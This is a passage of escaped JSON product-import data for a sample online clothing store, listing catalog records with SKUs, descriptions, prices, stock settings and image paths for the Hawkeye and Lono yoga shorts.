"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Gray\"},\"890\":{\"sku\":\"MSH05\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Hawkeye Yoga Short\",\"description\":\"<p>What more do you need than a sporty yoga short made with organic cotton and a little spandex for mobility? The Hawkeye Yoga Short brings a stylish, standard fit you can sport with confidence outside the studio.<\\/p>\\n<p>&bull; Dark gray shorts with red accents.<br \\/>&bull; 92% Organic Cotton 8% Spandex.<br \\/>&bull; Breathable stretch organic cotton.<br \\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer,material=CoolTech&trade;|Linen|Polyester|Rayon|Wool,pattern=Solid|Striped,climate=Indoor|Spring|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MSH05-32-Black,size=32,color=Black|sku=MSH05-32-Blue,size=32,color=Blue|sku=MSH05-32-Gray,size=32,color=Gray|sku=MSH05-33-Black,size=33,color=Black|sku=MSH05-33-Blue,size=33,color=Blue|sku=MSH05-33-Gray,size=33,color=Gray|sku=MSH05-34-Black,size=34,color=Black|sku=MSH05-34-Blue,size=34,color=Blue|sku=MSH05-34-Gray,size=34,color=Gray|sku=MSH05-36-Black,size=36,color=Black|sku=MSH05-36-Blue,size=36,color=Blue|sku=MSH05-36-Gray,size=36,color=Gray\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh05-gray_alt1.jpg,\\/m\\/s\\/msh05-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh05-gray_alt1.jpg,\\/m\\/s\\/msh05-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Base Layer\",\"material\":\"CoolTech&trade;|Linen|Polyester|Rayon|Wool\",\"pattern\":\"Solid|Striped\",\"climate\":\"Indoor|Spring|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"891\":{\"sku\":\"MSH06-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-32-Blue\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"892\":{\"sku\":\"MSH06-32-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-32-Gray\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-32-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Gray\"},\"893\":{\"sku\":\"MSH06-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-32-Red\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"894\":{\"sku\":\"MSH06-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-33-Blue\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"895\":{\"sku\":\"MSH06-33-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-33-Gray\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-33-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Gray\"},\"896\":{\"sku\":\"MSH06-33-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-33-Red\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-33-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Red\"},\"897\":{\"sku\":\"MSH06-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-34-Blue\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"898\":{\"sku\":\"MSH06-34-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-34-Gray\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, 